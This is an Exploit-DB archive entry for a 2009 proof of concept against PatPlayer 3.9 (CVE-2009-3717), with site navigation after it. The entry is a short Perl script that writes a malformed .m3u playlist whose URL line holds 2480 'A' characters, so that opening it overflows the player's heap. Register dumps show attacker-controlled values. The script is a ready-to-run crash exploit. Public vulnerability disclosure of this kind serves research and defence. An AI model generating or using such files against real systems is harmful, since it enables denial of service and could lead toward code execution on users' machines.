PatPlayer 3.9 - '.m3u' Local Heap Overflow (PoC)

EDB-ID:

9102

CVE:

2009-3717

EDB Verified:

Author:

Cyber-Zone

Type:

dos

Exploit:   /  

Platform:

Windows

Date:

2009-07-10

Vulnerable App: 
#!/usr/bin/perl
#
#
#
# PatPlayer v3.9 (M3U File) Local Heap Overflow PoC
#
#
# Found By : Cyber-Zone (ABDELKHALEK)
#
#
# Greatz : All friends (Jiko :)) Sec-r1z.CoM ..... IQ-TY ....
#
#
#EAX 41414141
#ECX 00000000
#EDX 004F1FC0 ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
#EBX 00B928DC
#ESP 0012FD2C
#EBP 0012FD78
#ESI 004F1CCC ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
#EDI 004EEA78 PatPlaye.004EEA78
#EIP 00404C59 PatPlaye.00404C59
#
my $Header = "#EXTM3U\n";

my $ex="http://"."A" x 2480; # Random

open(MYFILE,'>>cyber.m3u');

print MYFILE $Header.$ex;

close(MYFILE);

# milw0rm.com [2009-07-10]
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services